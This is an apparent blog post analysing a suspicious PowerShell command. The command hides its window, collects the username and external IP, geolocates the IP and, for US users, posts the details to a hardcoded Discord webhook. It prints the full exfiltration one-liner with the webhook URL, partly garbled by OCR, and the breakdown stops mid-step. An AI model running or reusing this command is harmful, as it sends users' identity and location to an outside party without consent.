Understanding Unexpected Command Prompt Activity: Analyzing a Suspicious PowerShell Script
Encountering a sudden Command Prompt (CMD) window that closes abruptly can be concerning, especially when the script’s behavior is unclear. Recently, a user reported such an incident, capturing the script’s output via OCR before it vanished. This post aims to evaluate the contents of the script, decipher its intentions, and provide guidance on how to respond.
The Script in Question
The captured command line appears as follows:
plaintext
C:\Windows\System32>powershell -w hidden -c "$u=$env:USERNAME; $i=(iwr 'https://api.ipify.org');$g=ira(\"http://ip-api.com/json/$i\") ;if($g.country -eq ‘United States'){ $b='https://discord.com/api/webhooks/1391522041089495120/ZAeZP6d0MyBhKZNxESBGEWnuhi7azGRqdTYHBHz3XX80sUwk1fXUanMLwjHFGLpDG_LN' ; $m=\"Username: $u‘nLocation: $($g.country)\";irm -Uri $b -Method Post -Body (@{content=$m} | ConvertTo-Json) -ContentType ‘application/json’}"
(Note: The original text appears to contain some typographical issues, such as inconsistent quotes and possible misspellings of PowerShell cmdlets. These may be artifacts from OCR processing. For clarity, the intended command likely resembles the following.)
Deciphering the Script’s Functionality
-
Hide the PowerShell Window: The
-w hiddenparameter prevents the window from appearing visibly, establishing stealth. -
Retrieve Current User Name:
$u=$env:USERNAMEstores the username of the current user. -
Gather External IP Address:
$i=(iwr 'https://api.ipify.org')fetches the external IP address, using the Invoke-WebRequest (iwr) command. -
Geolocate IP Address:
$g=invoke-restmethod 'http://ip-api.com/json/$i'contacts the IP geolocation API to determine the user’s country. -
Conditional Action Based on Location: If the user’s country is United States, then:
-
Construct a Webhook URL: `$b=’https://discord.com
Share this content:
